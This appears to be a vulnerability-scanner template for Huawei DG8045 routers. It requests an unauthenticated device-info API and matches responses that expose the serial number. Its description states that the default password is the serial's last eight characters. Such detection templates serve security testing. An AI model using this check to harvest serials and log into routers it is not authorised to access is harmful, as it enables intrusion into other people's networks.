id: huawei-dg8045-auth-bypass

info:
  name: Huawei dg8045 - Authentication Bypass
  description: The default password of this router is the last 8 characters of the device's serial number which exist in the back of the device and via the web app API as seen below.
  reference: https://www.exploit-db.com/exploits/50059
  author: geeknik
  severity: high
  tags: huawei,dg8045,auth,bypass

requests:
  - method: GET
    path:
      - "{{BaseURL}}/api/system/deviceinfo"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "DeviceName"
          - "SerialNumber"
          - "VER.A"
        condition: and
